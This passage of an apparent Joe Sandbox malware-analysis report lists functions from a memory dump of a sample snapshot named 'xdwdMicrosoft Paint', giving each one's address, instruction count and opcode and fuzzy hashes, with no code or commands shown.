                              Function 00007FFF60F56EC0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ad265d676c48f9cc9ec2f13a2d8d19417c2492073580f85c2b444ab768003633
                              • Instruction ID: af40b192173842b19995afe96ccd4ecf5fc738253c73f4e1fdb69f9fc15913c2
                              • Opcode Fuzzy Hash: ad265d676c48f9cc9ec2f13a2d8d19417c2492073580f85c2b444ab768003633
                              • Instruction Fuzzy Hash: 36516030918A4E8FEBA9DF28D8457A977D1FF68300F14822EE85DC3395DF3499458B82
                              Function 00007FFF60F5EE40 Relevance: .2, Instructions: 182COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf304a86725646ad73abc9955c6e2a8dfa6a61c09a4f9d03547d54eca95039ab
                              • Instruction ID: aabbf236ed3d60b017c8ddb95d6ad33511ad90ba2bd5460f900fd03c2cdd0649
                              • Opcode Fuzzy Hash: bf304a86725646ad73abc9955c6e2a8dfa6a61c09a4f9d03547d54eca95039ab
                              • Instruction Fuzzy Hash: 6E518C1199E2C24FE79B862458556B13FE4DF67215F2E01FBD489C72E3E90C180E8392
                              Function 00007FFF60F57717 Relevance: .2, Instructions: 182COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 39112c65959eeaf7ae5b5ddd0af79fdf87737ef1b9cb838c98f8cd9aa51f4eca
                              • Instruction ID: 68a230cbb25d63b660601a84b5df080b11b5b59b8536b5900f29f6151eebe2a8
                              • Opcode Fuzzy Hash: 39112c65959eeaf7ae5b5ddd0af79fdf87737ef1b9cb838c98f8cd9aa51f4eca
                              • Instruction Fuzzy Hash: 3E51A130608A4A8FEB69DF28E8453E977D1FF58301F14826ED84DC7395DF3899458B82
                              Function 00007FFF60F5457F Relevance: .2, Instructions: 181COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9b85208680c1f3359e80b7bf180bde1cafb95c92276460b6c855688df55d8b77
                              • Instruction ID: 465a9512b5bba8d0204799ab6620c9cc9d6d7be0e2f5703bd90de699ef99553a
                              • Opcode Fuzzy Hash: 9b85208680c1f3359e80b7bf180bde1cafb95c92276460b6c855688df55d8b77
                              • Instruction Fuzzy Hash: 96513E71918A1C8FDBA8DF58D845BE9BBF1FB58310F1082AAD40DE3251DF34A9858F81
                              Function 00007FFF60F5A530 Relevance: .2, Instructions: 173COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: df884faa4c61d1992206d95b78e3ad11aa76a553241bc021e37a7f7aab906fd7
                              • Instruction ID: cec36472dad5ca193fc6c8829b1d2728ce554e919a1bb0757b6f3f7b1d15f4e4
                              • Opcode Fuzzy Hash: df884faa4c61d1992206d95b78e3ad11aa76a553241bc021e37a7f7aab906fd7
                              • Instruction Fuzzy Hash: D251E03190D6898FD757E76888556E57FE0EF5B220B1901FAD088CB1A3EE2C581BC361
                              Function 00007FFF60F52FEA Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 144c552b9a6704400bfe174e8635ab99fc0d1541dfb0f88b5af4580f3f9c1817
                              • Instruction ID: 36e7640ee941b8f68969de2337fa58c1ea46e625ce3637a3d397e4ef6cf86950
                              • Opcode Fuzzy Hash: 144c552b9a6704400bfe174e8635ab99fc0d1541dfb0f88b5af4580f3f9c1817
                              • Instruction Fuzzy Hash: 47513121F1C51B8BFB5ABA6C84966BD36C2EFA4315FA40435E00DC33C6EE2CB9064746
                              Function 00007FFF60F522B5 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2a0c9be67d253b8528882b78630191a8d3f7f3ab093ff409de275ead1467c5b
                              • Instruction ID: d28a66029d0d2fafb13ea270ebda0362fa2d941074559946e29ed4e4de0a97d4
                              • Opcode Fuzzy Hash: f2a0c9be67d253b8528882b78630191a8d3f7f3ab093ff409de275ead1467c5b
                              • Instruction Fuzzy Hash: 9F515D36F0C54786FBA6AA68C4811BD27C2EFB6324F250639D54DC73C2DD2EAC564282
                              Function 00007FFF60F53540 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9434f8a429b78984f7c8b5336b94002e598b62bfb22e85ee882b8dc35ed3ea72
                              • Instruction ID: ceb53c747dc5f958409cc78f6fe8e7faf7e4fa66d6be2d5dd61a117ca3239d87
                              • Opcode Fuzzy Hash: 9434f8a429b78984f7c8b5336b94002e598b62bfb22e85ee882b8dc35ed3ea72
                              • Instruction Fuzzy Hash: 4F419421C2C5968AF379466CF4C24F9B3C1EB65720F64107DDCA982BC7BC1C68AA41C7
                              Function 00007FFF60F5C6DF Relevance: .1, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1dd673de9c7e7eff0c0efdc2c869b2d69f74fec9563f78c4e7abd43b52aa445
                              • Instruction ID: e3e208514d67549edde94596f1bdc479972d3a9d7fe802268b3623753b98323b
                              • Opcode Fuzzy Hash: f1dd673de9c7e7eff0c0efdc2c869b2d69f74fec9563f78c4e7abd43b52aa445
                              • Instruction Fuzzy Hash: 01412B71E1C90ACEEBA6E72894552BC77E1EF68301F640579D40FE3792EE2968058BC1
                              Function 00007FFF60F51B9F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c62230c46cae2992462373cd84406fcc0be7a96fc702dca6603a866406034d23
                              • Instruction ID: e567cacd51f78d4b0108f15ed85e7cbcc01bf7995dd9c7a6a65f0464b60e8006
                              • Opcode Fuzzy Hash: c62230c46cae2992462373cd84406fcc0be7a96fc702dca6603a866406034d23
                              • Instruction Fuzzy Hash: 2941BF04F2C52B8AF68977B811661BE0AE39F94306FE14834E10DD7BCFED6DE9060295
                              Function 00007FFF60F531F2 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e25a367e11a5892f1b49f509a775630146b49b654f1768fe253ae5f6241ea9bd
                              • Instruction ID: d2c3bc2525c0182ab684c6a869be0107ae39c8921c7fa12d7d8a50edca7622ae
                              • Opcode Fuzzy Hash: e25a367e11a5892f1b49f509a775630146b49b654f1768fe253ae5f6241ea9bd
                              • Instruction Fuzzy Hash: 4741FB21F2891B8BEB95BB2C80955B936D3EBE8315BA50475E00DC33D6EE3CE8424744
                              Function 00007FFF60F5ACC4 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3c83535711b11bcf4fb3b5dfb5d09059216e5f2413fd991612c30a1cf9c97a5
                              • Instruction ID: cc6ae6d5abd43406371c15f0cfaa228ce587fa07c0ac74fc87f4b991cbb25a12
                              • Opcode Fuzzy Hash: f3c83535711b11bcf4fb3b5dfb5d09059216e5f2413fd991612c30a1cf9c97a5
                              • Instruction Fuzzy Hash: 75417F30A18D1A8FEB96EB6C84556BCB7E1FFA8311B640079D40DD7396EE29AC428740
                              Function 00007FFF60F5AF47 Relevance: .1, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 75bad7563a693c80ed175f3d32db86bda8d4237780a893f834ea1ea3a32a6100
                              • Instruction ID: eb1b1a4b7a43172e1fdb141ab139db76f076af1797bf1ebbd56007ecfbf2e921
                              • Opcode Fuzzy Hash: 75bad7563a693c80ed175f3d32db86bda8d4237780a893f834ea1ea3a32a6100
                              • Instruction Fuzzy Hash: 81412A31A1891A8FEB95EB6CD8556BC77E1FFA8311F640479D50DD33D2EE2868418740
                              Function 00007FFF60F5A650 Relevance: .1, Instructions: 114COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 053181efe830e6a6d17a1789d6d946387833c505e5420da1fe4665cdac927f2f
                              • Instruction ID: 135172927d252611334c1a25d5f31b9a97589aec75d188820af3b9d4323d8989
                              • Opcode Fuzzy Hash: 053181efe830e6a6d17a1789d6d946387833c505e5420da1fe4665cdac927f2f
                              • Instruction Fuzzy Hash: 8931F622D4C5839FEB27A278881B4B93BD0DF76210F2905B5D489C72D3ED1C686B42A3
                              Function 00007FFF60F5C521 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c1b5a8ebd48c4afd6e2491b8f61f93c5acd81d4a95a14e00aae7ca1624ba2bac
                              • Instruction ID: 9c1a5ef56311fdb6e530ca531c87a1294d2cf3110bf475d640a79f8a5d31c654
                              • Opcode Fuzzy Hash: c1b5a8ebd48c4afd6e2491b8f61f93c5acd81d4a95a14e00aae7ca1624ba2bac
                              • Instruction Fuzzy Hash: F0311931A08A1C8FDF94EB68D885BEDB7F1FB68315F10416AD40ED3252DF34A9868B41
                              Function 00007FFF60F5BED9 Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 05eb31c2339cef9390c424b7d26d242664d85b2801846083f3cd67ea8257fa3d
                              • Instruction ID: 4a3176911baa5c30f36f9c85a184f0a24d19f045a92824efa24c639adcc8d29b
                              • Opcode Fuzzy Hash: 05eb31c2339cef9390c424b7d26d242664d85b2801846083f3cd67ea8257fa3d
                              • Instruction Fuzzy Hash: 13313E5080E3C68FE76B92644C25275BFE0DF23205F2959FBC589CA1E3ED1D681E8762
                              Function 00007FFF60F533D0 Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f8ee0d41eed9e82668e5ddac0dd7b00a3cfb33fdf91ffa96ee04555ded7fdf5
                              • Instruction ID: 5e4e9b3ef734fdae8976502ae73285a8f50f0c12c7ba0178e9d752e8e93094db
                              • Opcode Fuzzy Hash: 8f8ee0d41eed9e82668e5ddac0dd7b00a3cfb33fdf91ffa96ee04555ded7fdf5
                              • Instruction Fuzzy Hash: 3F316D61A0D3C24FE717977898A22A47FB18F53210F2A01F7D089CB5E3D91D581B8363
                              Function 00007FFF60F5C18F Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c2fc9e680010fcc858d1213190d70052a13cbf3eaa878006c7967c92cf9232f
                              • Instruction ID: 3b68198ebf6c8bc59d6eab8a5678b492fec8bc7cb18ff09bbdb9d21853ee4a1c
                              • Opcode Fuzzy Hash: 2c2fc9e680010fcc858d1213190d70052a13cbf3eaa878006c7967c92cf9232f
                              • Instruction Fuzzy Hash: F1216D72D0C94B8EFBAAD5A8881A37837D0DB74315F741A3AC51FD23D2ED28691A41C2
                              Function 00007FFF60F5B007 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0912b30fb3cf13a386a08d417b2e03eda27eb8a83f27f8354ab3ecae3a5c21da
                              • Instruction ID: 89e777f7029fbd4299c195c09483dd59ad94b807d1c062d03dba890ebe787733
                              • Opcode Fuzzy Hash: 0912b30fb3cf13a386a08d417b2e03eda27eb8a83f27f8354ab3ecae3a5c21da
                              • Instruction Fuzzy Hash: E3211B31A1881ACFEB95FB68C4596BDB3E1FF68301F600479D50DD32E2EE2868418751
                              Function 00007FFF60F57D46 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 479043e14eacff11b36d64406d67400ec39e7692410ac016283769da48db319f
                              • Instruction ID: 9002ab626b61203f6f0f812816529098946667846a7c0611d6b05d7fe192bab3
                              • Opcode Fuzzy Hash: 479043e14eacff11b36d64406d67400ec39e7692410ac016283769da48db319f
                              • Instruction Fuzzy Hash: 36312870518B8C8FEBA5DF28C845BD97BE1FF98710F10866AE84DC7255CB38A945CB81
                              Function 00007FFF60F5C171 Relevance: .1, Instructions: 82COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 507b70489a25469ae44cd8e0657db421be7a8ab988aae3051aebbd4cd4884a3e
                              • Instruction ID: 5ca7fbca003a63c061e29d6aef0b8b69a1c370324c723b13528ef02e45472f7e
                              • Opcode Fuzzy Hash: 507b70489a25469ae44cd8e0657db421be7a8ab988aae3051aebbd4cd4884a3e
                              • Instruction Fuzzy Hash: D7219A62C0C4478EFB6E9AA8880A2B837D0DF74315F391A3AC51FD23D2ED1C650A41D1
                              Function 00007FFF60F59231 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 318e8bbfbe81c6c35620a783de14fe3f6b48e3ba66e0dd4bd3328b75d1d058d2
                              • Instruction ID: 9378683bb430c76ee2bb96e2ed45a3f983c53a571fb548f5b50f179eccdaf3af
                              • Opcode Fuzzy Hash: 318e8bbfbe81c6c35620a783de14fe3f6b48e3ba66e0dd4bd3328b75d1d058d2
                              • Instruction Fuzzy Hash: F9218362E0C645DFEB5B9728C8456A83BE1EF76320F2901BBC04DD72D2ED2D5C098352
                              Function 00007FFF60F5AF4D Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 794e051eaca82a874298afde34a4a8bf7748fdfdd9aded78a770bd7bbe4f0098
                              • Instruction ID: 5c0f1c201042c14e28be5ff0bfcf800aa04d521b152dc985fa4691faef4a3e6a
                              • Opcode Fuzzy Hash: 794e051eaca82a874298afde34a4a8bf7748fdfdd9aded78a770bd7bbe4f0098
                              • Instruction Fuzzy Hash: F9113630E1891E8FE795FB2C84596BC73D1FF58711B5405B5D40DE33A2ED28AC418740
                              Function 00007FFF60F537DA Relevance: .1, Instructions: 60COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e93d078f7ca580c928c5b7d614846616e21d354be59234d0a3a104bc805337ce
                              • Instruction ID: 9479d2d172825d964d49b7fbde9b6ec941d1dd427b3dccbed18d87f4fba2d77b
                              • Opcode Fuzzy Hash: e93d078f7ca580c928c5b7d614846616e21d354be59234d0a3a104bc805337ce
                              • Instruction Fuzzy Hash: A5015232F1D82A8BF699763C90552F863C2EB6D361B5904BAE80EE33D1ED1D5C814385
                              Function 00007FFF60F5D16D Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8abced45e9b9b5cb0ff983a8b55f96d9a4810d7ba382629688127bfc2dd5771
                              • Instruction ID: 8fbb6eda713b0c7eba3d1308cc6c78cbf5251330b201bc5f2cc7e0fe4638d5e8
                              • Opcode Fuzzy Hash: d8abced45e9b9b5cb0ff983a8b55f96d9a4810d7ba382629688127bfc2dd5771
                              • Instruction Fuzzy Hash: DC011E32E4D92D89FB69A25CA8436F8A3D1EBA5334F141076D65E936C2EC19385283C5
                              Function 00007FFF60F5927F Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bfe1b99c7148476c3ff04fa5f05ba9ec5bb02352c18624d981134325ec50c54
                              • Instruction ID: 876f7fcc438046bdbfaa5454ea0dde02c798da5f3b50f485958f7b445f7fada3
                              • Opcode Fuzzy Hash: 2bfe1b99c7148476c3ff04fa5f05ba9ec5bb02352c18624d981134325ec50c54
                              • Instruction Fuzzy Hash: E6012971E1C91D9EEB55AB6CD4886AC77E1FFA8321F254137D44DE3290DE2898828781
                              Function 00007FFF60F5A4C1 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c09ff4005e7651730cd389fab00c28ed9336f03d47ca5baffe5fd52bb6a1a897
                              • Instruction ID: b2cece6c46afa4f15d84a62be63c499fcfbea378ad5de6ef99f56b2503834464
                              • Opcode Fuzzy Hash: c09ff4005e7651730cd389fab00c28ed9336f03d47ca5baffe5fd52bb6a1a897
                              • Instruction Fuzzy Hash: D0012130B1C91ACFEB89E76C94596B877E2EF59305F600079D50DC33A2EE39A8528750
                              Function 00007FFF60F516D3 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2dc2463227607f80bbd9a46555b42a27f7e213408974f7e3b6a7691bf4af2ba
                              • Instruction ID: e364b1bbf35f2b864dd9899047ad5d6df87411c4d83901fb1f55c1a904fd9722
                              • Opcode Fuzzy Hash: f2dc2463227607f80bbd9a46555b42a27f7e213408974f7e3b6a7691bf4af2ba
                              • Instruction Fuzzy Hash: 7B018F42D1C42786FB527AACA4813FD76C0EF68354F6A09B0D98DC33C2DE0C6C5502CA
                              Function 00007FFF60F51668 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 06a350549a80470f439019b5c4b1dd8fbb90f9266eb66fb839e4356c8f487b77
                              • Instruction ID: 29be4069be7bd27552463c851040fcaffce682f98009aad80d1820f805498fdf
                              • Opcode Fuzzy Hash: 06a350549a80470f439019b5c4b1dd8fbb90f9266eb66fb839e4356c8f487b77
                              • Instruction Fuzzy Hash: 87F03642C1D86B9AF79679ACA4556AC77C0FB393A0F6A4870D99D972C1DD0C3C4102D9
                              Function 00007FFF60F52ABC Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 88bd9f8b83621423fd1295f3eec90459eb1e842b6388f4da9761c911491da92d
                              • Instruction ID: 224943f38fecf82a19ee8fe6eb12501dda2fde4e2969d8da7b5c789f0a21337a
                              • Opcode Fuzzy Hash: 88bd9f8b83621423fd1295f3eec90459eb1e842b6388f4da9761c911491da92d
                              • Instruction Fuzzy Hash: 8DF03030F18E0A5FD799DB78805927876E3FB95201F900A79D01ED37C2DF79A8518380
                              Function 00007FFF60F52ADF Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 56305a694230177d40d2bcf4c6473a212cb137fd5ba914f42be5252667b445fc
                              • Instruction ID: 436f15c8e79f3558130e48221e011e5d39305cb8097d1a90e1febd9b2f934f64
                              • Opcode Fuzzy Hash: 56305a694230177d40d2bcf4c6473a212cb137fd5ba914f42be5252667b445fc
                              • Instruction Fuzzy Hash: C2F06221F18A0B4FD798AB789095169B2E3FF94301B914AB4D00EC76CBDE3CEC418340
                              Function 00007FFF60F580D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: 89191f8fa9244851ff1b6556ec30c45ad996cf71cb06ca804e9af4d475f34579
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 27E0ED10F2D80E87AAAA515D68562B916D1DBB5710FB80036D50EE27C4ED9E6C831296
                              Function 00007FFF60F580E0 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
